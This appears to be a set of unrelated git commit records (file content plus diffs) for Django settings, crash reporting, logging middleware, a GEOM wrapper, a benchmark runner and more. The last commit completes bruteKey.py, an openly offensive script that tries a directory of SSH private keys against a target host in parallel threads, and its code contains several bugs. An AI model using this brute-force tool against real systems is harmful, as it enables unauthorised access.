darts/darts/settings.py
""" Django settings for darts project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'yg&r*1k#$nak&g*9ay6zh!+@*=f=ids5u10a!!r^yjvltw0&8=' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'darts.urls' WSGI_APPLICATION = 'darts.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/'
Python
0
@@ -1000,16 +1000,34 @@ files',%0A + 'djangobower'%0A )%0A%0AMIDDL @@ -2050,8 +2050,494 @@ tatic/'%0A +STATIC_ROOT = os.path.join(BASE_DIR, 'static')%0ASTATIC_DIRS = (%0A os.path.join(BASE_DIR, 'assets'),%0A)%0A%0ASTATICFILES_FINDERS = (%0A 'django.contrib.staticfiles.finders.FileSystemFinder',%0A 'django.contrib.staticfiles.finders.AppDirectoriesFinder',%0A 'djangobower.finders.BowerFinder',%0A)%0A%0ATEMPLATE_DIRS = (%0A os.path.join(BASE_DIR, 'templates'),%0A)%0A%0A# Djangobower%0ABOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')%0ABOWER_INSTALLED_APPS = (%0A 'jquery',%0A 'bootstrap',%0A)
5273e0fcdf2b7f1b03301cb0834b07da82064b98
Remove trailing /n
mailproc/vidmaster.py
mailproc/vidmaster.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Zoe vidmaster - https://github.com/rmed/zoe-vidmaster # # Copyright (c) 2015 Rafael Medina García <[email protected]> # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse import sys parser = argparse.ArgumentParser() parser.add_argument('--mail-subject', dest='subject') parser.add_argument('--msg-sender-alias', dest='sender') parser.add_argument('--application/octet-stream', dest='script') if __name__ == '__main__': args, unknown = parser.parse_known_args() if args.subject != "vidmaster": sys.exit(0) print("message dst=vidmaster&tag=compose&script=%s&sender=%s\n" % ( args.script, args.sender))
Python
0.000017
@@ -1689,10 +1689,8 @@ r=%25s -%5Cn %22 %25
a7a1a83bf0f6546b1e985b7c4611b5b83df25853
Add python's version in breakpad stack traces
breakpad.py
breakpad.py
# Copyright (c) 2009 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Breakpad for Python. Sends a notification when a process stops on an exception. It is only enabled when all these conditions are met: 1. hostname finishes with '.google.com' 2. main module name doesn't contain the word 'test' 3. no NO_BREAKPAD environment variable is defined """ import atexit import getpass import os import urllib import traceback import socket import sys # Configure these values. DEFAULT_URL = 'https://chromium-status.appspot.com/breakpad' _REGISTERED = False def FormatException(e): """Returns a human readable form of an exception. Adds the maximum number of interesting information in the safest way.""" try: out = repr(e) except Exception: out = '' try: out = str(e) if isinstance(e, Exception): # urllib exceptions, usually the HTTP headers. if hasattr(e, 'headers'): out += '\nHeaders: %s' % e.headers if hasattr(e, 'url'): out += '\nUrl: %s' % e.url if hasattr(e, 'msg'): out += '\nMsg: %s' % e.msg # The web page in some urllib exceptions. if hasattr(e, 'read') and callable(e.read): out += '\nread(): %s' % e.read() if hasattr(e, 'info') and callable(e.info): out += '\ninfo(): %s' % e.info() except Exception: pass return out def SendStack(last_tb, stack, url=None): """Sends the stack trace to the breakpad server.""" if not url: url = DEFAULT_URL print 'Sending crash report ...' try: params = { 'args': sys.argv, 'stack': stack[0:4096], 'user': getpass.getuser(), 'exception': FormatException(last_tb), 'host': socket.getfqdn(), 'cwd': os.getcwd(), } # pylint: disable=W0702 print('\n'.join(' %s: %s' % (k, v[0:50]) for k, v in params.iteritems())) request = urllib.urlopen(url, urllib.urlencode(params)) print(request.read()) request.close() except IOError: print('There was a failure while trying to send the stack trace. Too bad.') def CheckForException(): """Runs at exit. Look if there was an exception active.""" last_value = getattr(sys, 'last_value', None) if last_value and not isinstance(last_value, KeyboardInterrupt): last_tb = getattr(sys, 'last_traceback', None) if last_tb: SendStack(last_value, ''.join(traceback.format_tb(last_tb))) def Register(): """Registers the callback at exit. Calling it multiple times is no-op.""" global _REGISTERED if _REGISTERED: return _REGISTERED = True atexit.register(CheckForException) # Skip unit tests and we don't want anything from non-googler. if (not 'test' in sys.modules['__main__'].__file__ and not 'NO_BREAKPAD' in os.environ and (socket.getfqdn().endswith('.google.com') or socket.getfqdn().endswith('.chromium.org'))): Register() # Uncomment this line if you want to test it out. #Register()
Python
0.000057
@@ -1840,24 +1840,56 @@ s.getcwd(),%0A + 'version': sys.version,%0A %7D%0A #
95d9c3ecd9a8c2aa73fd91ffdf40a55fee541dd3
Enable flatpages without middleware.
suorganizer/urls.py
suorganizer/urls.py
"""suorganizer URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.8/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Add an import: from blog import urls as blog_urls 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls)) """ from django.conf.urls import include, url from django.contrib import admin from blog import urls as blog_urls from contact import urls as contact_urls from organizer.urls import ( newslink as newslink_urls, startup as startup_urls, tag as tag_urls) from .views import redirect_root urlpatterns = [ url(r'^$', redirect_root), url(r'^admin/', include(admin.site.urls)), url(r'^blog/', include(blog_urls)), url(r'^contact/', include(contact_urls)), url(r'^newslink/', include(newslink_urls)), url(r'^startup/', include(startup_urls)), url(r'^tag/', include(tag_urls)), ]
Python
0
@@ -687,16 +687,81 @@ rt admin +%0Afrom django.contrib.flatpages import %5C%0A urls as flatpage_urls %0A%0Afrom b @@ -1283,10 +1283,49 @@ urls)),%0A + url(r'%5E', include(flatpage_urls)),%0A %5D%0A
411751a10ece8b84bb122422b8d58f22710731aa
Fix typo
relayer/flask/logging_middleware.py
relayer/flask/logging_middleware.py
from datetime import datetime class LoggingMiddleware(object): def __init__(self, app, wsgi_app, context, logging_topic): self.app = app self.wsgi_app = wsgi_app self.context = context self.logging_topic = logging_topic def __call__(self, environ, start_response): with self.app.app_context(): start_time = datetime.utcnow() status_code = None content_length = None self.context.start_request() def logging_start_response(status, response_headers, exc_info=None): nonlocal status_code, content_length status_code = int(status.partition(' ')[0]) for name, value in response_headers: if name.lower() == 'content-length': content_length = int(value) break return start_response(status, response_headers, exc_info) response = self.wsgi_app(environ, logging_start_response) if content_length is None: content_length = len(b''.join(response)) elapsed_time = datetime.utcnow() - start_time elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000 request_log = { 'date': start_time.isoformat(), 'user_agent': environ.get('HTTP_USER_AGENT'), 'method': environ.get('REQUEST_METHOD'), 'path': environ.get('PATH_INFO'), 'query_string': environ.get('QUERY_STRING'), 'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')), 'x_forwarded_for': environ.get('X_Forwarded_For'), 'status': status_code, 'content_length': content_length, 'request_time': elapsed_time_milliseconds } self.context.end_request(self.logging_topic, request_log) return response
Python
0.999999
@@ -1728,20 +1728,20 @@ 'X_F -orwarded_For +ORWARDED_FOR '),%0A
e29878f36ed78c8e7acf683029252001daf1e4c4
Add a description method.
bsd/geom.py
bsd/geom.py
#+ # Copyright 2015 iXsystems, Inc. # All rights reserved # # Redistribution and use in source and binary forms, with or without # modification, are permitted providing that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, # STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING # IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ##################################################################### import sysctl from xml.etree import ElementTree as etree _classes = {} _geoms = {} _providers = {} class GEOMBase(object): def __init__(self, xml): self.xml = xml @property def id(self): return self.xml.attrib['id'] class GEOMClass(GEOMBase): @property def name(self): return self.xml.find('name').text @property def geoms(self): for i in self.xml.findall('geom'): yield GEOMObject(i) def geom_by_name(self, name): ret = list(filter(lambda g: g.name == name, self.geoms)) return ret[0] if len(ret) > 0 else None def __str__(self): return "<geom.GEOMClass name '{0}' id '{1}'>".format(self.name, self.id) def __repr__(self): return str(self) def __getstate__(self): return { 'name': self.name, 'geoms': [x.__getstate__() for x in self.geoms] } class GEOMObject(GEOMBase): @property def name(self): return self.xml.find('name').text @property def rank(self): return int(self.xml.find('rank').text) @property def clazz(self): return class_by_id(self.xml.find('class').attrib['ref']) @property def provider(self): return self.providers.next() @property def providers(self): for i in self.xml.findall('provider'): yield GEOMProvider(i) @property def consumers(self): for i in self.xml.findall('consumer'): yield GEOMConsumer(i) @property def config(self): config = self.xml.find('config') if config is not None: return {i.tag: i.text for i in config} return None def __str__(self): return "<geom.GEOMObject name '{0}' id '{1}'>".format(self.name, self.id) def __repr__(self): return str(self) def __getstate__(self): return { 'id': self.id, 'name': self.name, 'class_id': self.clazz.id, 'config': self.config, 'providers': [x.__getstate__() for x in self.providers], 'consumers': [x.__getstate__() for x in self.consumers] } class GEOMProvider(GEOMBase): @property def geom(self): return geom_by_id(self.xml.find('geom').attrib['ref']) @property def mode(self): return self.xml.find('mode').text @property def name(self): return self.xml.find('name').text @property def mediasize(self): return int(self.xml.find('mediasize').text) @property def sectorsize(self): return int(self.xml.find('sectorsize').text) @property def stripesize(self): return int(self.xml.find('stripesize').text) @property def stripeoffset(self): return int(self.xml.find('stripeoffset').text) @property def config(self): config = self.xml.find('config') if config is not None: return {i.tag: i.text for i in config} return None def __str__(self): return "<geom.GEOMProvider name '{0}' id '{1}'>".format(self.name, self.id) def __repr__(self): return str(self) def __getstate__(self): return { 'name': self.name, 'mode': self.mode, 'geom_id': self.geom.id, 'mediasize': self.mediasize, 'sectorsize': self.sectorsize, 'stripesize': self.stripesize, 'stripeoffset': self.stripeoffset, 'config': self.config } class GEOMConsumer(GEOMBase): @property def geom(self): return geom_by_id(self.xml.find('geom').attrib['ref']) @property def mode(self): return self.xml.find('mode').text @property def provider(self): return provider_by_id(self.xml.find('provider').attrib['ref']) @property def config(self): config = self.xml.find('config') if config is not None: return {i.tag: i.text for i in config} return None def __str__(self): return "<geom.GEOMConsumer id '{0}'>".format(self.id) def __repr__(self): return str(self) def __getstate__(self): return { 'geom_id': self.geom.id, 'provider_id': self.provider.id, 'config': self.config } def scan(): confxml = sysctl.sysctlbyname('kern.geom.confxml').strip('\x00') tree = etree.fromstring(confxml) for i in tree.findall('class'): cls = GEOMClass(i) _classes[cls.id] = cls for g in cls.geoms: _geoms[g.id] = g for p in g.providers: _providers[p.id] = p def classes(): return _classes.values() def geoms(): return _geoms.values() def class_by_id(ident): return _classes[ident] def class_by_name(name): ret = list(filter(lambda g: g.name == name, _classes.values())) return ret[0] if len(ret) > 0 else None def geom_by_id(ident): return _geoms[ident] def geom_by_name(classname, name): cls = class_by_name(classname) if not cls: return None return cls.geom_by_name(name) def provider_by_id(ident): return _providers[ident] # Do initial scan at module load time scan()
Python
0.000107
@@ -4197,32 +4197,203 @@ offset').text)%0A%0A + @property%0A def description(self):%0A try:%0A d = self.xml.find(%22config/descr%22)%0A return d.text%0A except:%0A return None%0A %0A @property%0A
17eaf5d3d0b3cf6c6fffc4ea70499cd9feeb6723
Set Logger to UTC
browbeat.py
browbeat.py
#!/usr/bin/env python # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from lib.Elastic import browbeat_uuid from lib import PerfKit from lib import Rally from lib import Shaker from lib import WorkloadBase import argparse import logging import sys import yaml import datetime import os from pykwalify import core as pykwalify_core from pykwalify import errors as pykwalify_errors _workload_opts = ['perfkit', 'rally', 'shaker'] _config_file = 'browbeat-config.yaml' debug_log_file = 'log/debug.log' def _load_config(path, _logger): try: stream = open(path, 'r') except IOError: _logger.error("Configuration file {} passed is missing".format(path)) exit(1) config = yaml.load(stream) stream.close() validate_yaml(config, _logger) return config def validate_yaml(config, _logger): _logger.info("Validating the configuration file passed by the user") stream = open("lib/validate.yaml", 'r') schema = yaml.load(stream) check = pykwalify_core.Core(source_data=config, schema_data=schema) try: check.validate(raise_exception=True) _logger.info("Validation successful") except pykwalify_errors.SchemaError as e: _logger.error("Schema Validation failed") raise Exception('File does not conform to schema: {}'.format(e)) def _run_workload_provider(provider, config): _logger = logging.getLogger('browbeat') if provider == "perfkit": perfkit = PerfKit.PerfKit(config) perfkit.start_workloads() elif provider == "rally": rally = Rally.Rally(config) rally.start_workloads() elif provider == "shaker": shaker = Shaker.Shaker(config) shaker.run_shaker() else: _logger.error("Unknown workload provider: {}".format(provider)) def main(): parser = argparse.ArgumentParser( description="Browbeat Performance and Scale testing for Openstack") parser.add_argument( '-s', '--setup', nargs='?', default=_config_file, help='Provide Browbeat YAML configuration file. Default is ./{}'.format(_config_file)) parser.add_argument('workloads', nargs='*', help='Browbeat workload(s). Takes a space separated' ' list of workloads ({}) or \"all\"'.format(', '.join(_workload_opts))) parser.add_argument('--debug', action='store_true', help='Enable Debug messages') _cli_args = parser.parse_args() _logger = logging.getLogger('browbeat') _logger.setLevel(logging.DEBUG) _formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)7s - %(message)s') _dbg_file = logging.FileHandler(debug_log_file) _dbg_file.setLevel(logging.DEBUG) _dbg_file.setFormatter(_formatter) _ch = logging.StreamHandler() if _cli_args.debug: _ch.setLevel(logging.DEBUG) else: _ch.setLevel(logging.INFO) _ch.setFormatter(_formatter) _logger.addHandler(_dbg_file) _logger.addHandler(_ch) _logger.debug("CLI Args: {}".format(_cli_args)) # Load Browbeat yaml config file: _config = _load_config(_cli_args.setup, _logger) # Default to all workloads if _cli_args.workloads == []: _cli_args.workloads.append('all') if len(_cli_args.workloads) == 1 and 'all' in _cli_args.workloads: _cli_args.workloads = _workload_opts invalid_wkld = [wkld for wkld in _cli_args.workloads if wkld not in _workload_opts] if invalid_wkld: _logger.error("Invalid workload(s) specified: {}".format(invalid_wkld)) if 'all' in _cli_args.workloads: _logger.error("If you meant 'all' use: './browbeat.py all' or './browbeat.py'") exit(1) else: time_stamp = datetime.datetime.utcnow().strftime("%Y%m%d-%H%M%S") _logger.info("Browbeat test suite kicked off") _logger.info("Browbeat UUID: {}".format(browbeat_uuid)) _logger.info("Running workload(s): {}".format(','.join(_cli_args.workloads))) for wkld_provider in _cli_args.workloads: if wkld_provider in _config: if _config[wkld_provider]['enabled']: _run_workload_provider(wkld_provider, _config) else: _logger.warning("{} is not enabled in {}".format(wkld_provider, _cli_args.setup)) else: _logger.error("{} is missing in {}".format(wkld_provider, _cli_args.setup)) result_dir = _config['browbeat']['results'] WorkloadBase.WorkloadBase.print_report(result_dir, time_stamp) _logger.info("Saved browbeat result summary to {}".format( os.path.join(result_dir,time_stamp + '.' + 'report'))) WorkloadBase.WorkloadBase.print_summary() _logger.info("Browbeat Finished, UUID: {}".format(browbeat_uuid)) if __name__ == '__main__': sys.exit(main())
Python
0.000012
@@ -764,16 +764,28 @@ rt yaml%0A +import time%0A import d @@ -3128,24 +3128,63 @@ message)s')%0A + _formatter.converter = time.gmtime%0A _dbg_fil
911e961f189967554bc5a046f022bb1c394cc119
Debug and test before finishing. p50-52
bruteKey.py
bruteKey.py
#!/usr/bin/env python import pexpect, optparse, os from threading import * maxConnections = 5 connection_lock = BoundSemapohre(value=maxConnections) Stop = False Fails = 0 usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> " def banner(): print "##### SSH Weak Key Exploit #######" usage print"" def connect(user, host, keyfile, release): global Stop global Fails try: perm_denied = 'Permission denied' ssh_newkey = 'Are you sure you wan tto continue' conn_closed = 'Connection closed by remote host' opt = ' -o PasswordAuthentication=no' connStr = 'ssh '+user+'@'+host+' -i'+keyfile+opt child = pexpect.spawn(connStr) ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ]) if ret == 2: print '[-] Adding Host to ~/.ssh/known_hosts' child.sendline('yes') connect(user, host, keyfile, False) elif ret == 3: print '[-] Connection Closed By Remote Host' Fails += 1 elif ret > 3: print '[+] Success. '+str(keyfile) Stop = True finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser('usage%prog -H '+'target host -u <user> -d <directory>') parser. if __name__ == '__main__': main()
Python
0
@@ -1173,21 +1173,903 @@ %09parser. -%0A%0A%0A%0A%0A +add_option('-H', dest='tgtHost', type='string', help='specify target host')%0A%09parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')%0A%09parser.add_option('u', dest=user, type='string', help='specify the user')%0A%09(options, args) = parser.parse_args()%0A%09host = options.tgtHost%0A%09passDir = options.passDir%0A%09user =options.user%0A%09if host == None or passDir == None or user == None:%0A%09%09print parser.usage%0A%09%09exit(0)%0A%09for filename in os.listdir(passDir):%0A%09%09if Stop:%0A%09%09%09print '%5B*%5D Exiting: Key Found.'%0A%09%09%09exit(0)%0A%09%09if Fails %3E 5:%0A%09%09%09print '%5B!%5D Exiting: '+'Too Many Connections Closed by Remote Host.'%0A%09%09%09print '%5B!%5D Adjust number of simultaneous threads.'%0A%09%09%09exit(0)%0A%0A%09%09connection_lock.acquire()%0A%09%09fullpath = os.path.join(passDir, filename)%0A%09%09print '%5B-%5D Testing Keyfile '+str(fullpath)%0A%09%09t = Thread(target=connect, args =(user, host, fullpath, True))%0A%09%09child = t.start() %0A%0Aif __n